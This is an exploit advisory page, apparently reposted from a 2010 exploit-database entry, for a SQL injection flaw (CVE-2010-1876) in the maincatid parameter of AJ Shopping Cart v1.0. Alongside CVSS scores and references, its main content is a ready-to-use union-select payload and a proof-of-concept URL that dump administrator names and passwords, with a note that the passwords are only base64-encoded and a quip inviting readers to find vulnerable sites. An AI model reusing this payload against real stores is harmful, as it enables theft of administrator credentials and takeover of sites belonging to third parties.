AJ Shopping Cart v1.0 (maincatid) SQL Injection Vulnerability

2010-04-22 / 2010-04-23
Credit: v3n0m
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-1876
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

----------------------------------------------------------------------- AJ Shopping Cart v1.0 (maincatid) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : April, 23-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : AJ Shopping Cart Vendor : http://www.ajsquare.com/ Price : $1999.00 USD Version : v1.0 Google Dork : Use your brain & imagination:) The AJ Shopping Cart V 1.0 attracts many customers for developing their businesses. Our php shopping cart is supplied with easy and vivid provisions to help the users with all requirements listed for enhancing the business. The merits you can really rely on success, complete establishment and enthralling growth in running a on line store. There are steps taken to add more colors in the development of our shopping Cart. It has come up with new features for controlling the store. ---------------------------------------------------------------- Exploit: ~~~~~~~ -99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table-- SQLi p0c: ~~~~~~~ http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=[SQLi] http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=-99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table-- ** Password encrypted "base64_encode" ---------------------------------------------------------------- Shoutz: ~~~~ - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi- - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag - kiddies,whitehat,c4uR [aku benci dirimu, aku cinta martabak mu],mywisdom,yadoy666,udhit - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers) - elicha cristia [kamu kemana aja? Mizz You :)] - N.O.C & Technical Support @office - #yogyacarderlink @irc.dal.net ---------------------------------------------------------------- Contact: ~~~~ v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com Homepage: http://yogyacarderlink.web.id/ http://v3n0m.blogdetik.com/ http://elich4.blogspot.com/ << Update donk >_<

Referencje:

http://xforce.iss.net/xforce/xfdb/58049
http://www.exploit-db.com/exploits/12349
http://secunia.com/advisories/39551
http://packetstormsecurity.org/1004-exploits/ajshoppingcart-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top